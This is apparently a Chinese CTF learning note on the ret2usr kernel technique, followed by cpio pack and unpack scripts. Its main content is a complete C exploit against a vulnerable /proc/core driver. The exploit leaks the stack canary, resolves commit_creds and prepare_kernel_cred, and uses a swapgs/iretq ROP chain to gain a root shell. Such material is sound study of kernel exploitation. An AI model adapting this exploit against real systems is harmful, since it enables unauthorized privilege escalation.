ret2user

ret2usr

古老的手法，一般是在没开semp的情况下，用户空间不能访问内核态，内核态可以直接执行内核态的代码，所以可以在用户态写上提权代码，然后内核态访问这段代码，最后返回用户态执行执行system(“/bin/sh”);

注意不要直接在内核态执行system(“/bin/sh”)

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
void usr_shell(){
    if(getuid()==0){
        printf("[*]----getshell ok");
        system("/bin/sh");
    }else{
        puts("[*] getshell fail");
    }
    exit(0);
}

size_t commit_creds=0;
size_t prepare_kernel_cred=0;
size_t raw_vmlinux_base=0xffffffff81000000;
size_t vmlinux_base=0;
size_t find_symbols(){
    FILE* kallsyms_fd=fopen("/tmp/kallsyms","r");
    if(kallsyms_fd<0){
        puts("[*]opne kallsyms error");
        exit(0);
    }
    char buf[0x30]={0};
    while (fgets(buf,0x30,kallsyms_fd))
    {
        printf("%s\n",buf);
        if(commit_creds&prepare_kernel_cred){
            return 0;
        }
        if(strstr(buf,"commit_creds")&&!commit_creds){
            char hex[20]={0};
            strncpy(hex,buf,16);
            sscanf(hex,"%llx",&commit_creds);
            printf("commit_creds_addr:%p\n",commit_creds);
            vmlinux_base=commit_creds-0x9c8e0;
            printf("vmlinux_base_addr:%p",vmlinux_base);

        }
        if(strstr(buf,"prepare_kernel_cred")&&!prepare_kernel_cred){
            char hex[20]={0};
            strncpy(hex,buf,16);
            sscanf(hex,"%llx",&prepare_kernel_cred);
            printf("prepare_kernel_cred_addr:%p\n",prepare_kernel_cred);
            vmlinux_base=prepare_kernel_cred-0x9cce0;


        }
    }
    if(!(prepare_kernel_cred&commit_creds)){
        puts("[*]addr error");
        exit(0);
    }
}
size_t user_cs,user_ss,user_rflags,user_sp;
void save_status(){
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp,rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("[*]status has ben saved.");
}
void set_off(int fd,long long idx){
    printf("[*]set off to %ld\n",idx);
    ioctl(fd,0x6677889c,idx);
}
void core_read(int fd,char *buf){
    puts("[*]read to buf.");
    ioctl(fd, 0x6677889B, buf);
}
void core_copy_func(int fd,long long size){
    printf("[*]copy from user with size :%ld\n",size);
    ioctl(fd, 0x6677889A, size);
}

void privilege_escalation(){
    if(commit_creds && prepare_kernel_cred){
        (*((void (*)(char *))commit_creds))(
            (*((char* (*)(int))prepare_kernel_cred))(0)
        );
    }
}

int main(){
    save_status();
    int fd=open("/proc/core",2);
    if(fd<0){
        puts("[*]open core error");
        exit(0);
    }
    find_symbols();
    ssize_t offset=vmlinux_base-raw_vmlinux_base;
    set_off(fd,0x40);
    char buf[0x40]={0};
    core_read(fd,buf);
    size_t canary=((size_t *)buf)[0];
    printf("[*]canary: %p\n",canary);
    size_t rop[0x1000]={0};
    int i;
    for(i=0;i<10;i++){
        rop[i]=canary;
    }
    rop[i++] =(size_t)privilege_escalation;
    rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
    rop[i++] = 0;

    rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret; 

    rop[i++] = (size_t)usr_shell;         // rip 
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    write(fd,rop,0x800);
    core_copy_func(fd,0xffffffffffff0000 | (0x100));
}

这里记录一下自己写的打包和解包的shell脚本

解包 命令行第一个参数是相对于rootfs文件夹cpio的相对路径，第二个参数是在rootfs文件中储存cpio文件的文件名，注意如果cpio文件是压缩包形式，那先解压缩，然后再执行shell脚本

#!/bin/bash

mkdir rootfs
cd rootfs
mv $1 $2
cpio -idmv < $2
mv $2 $1

打包 第一个参数是储存cpio文件相对路径。

#!/bin/bash

find . | cpio -o --format=newc > $1

一般情况下挺好用的，但有时候题目会给打包和解包文件，注意使用题目给的。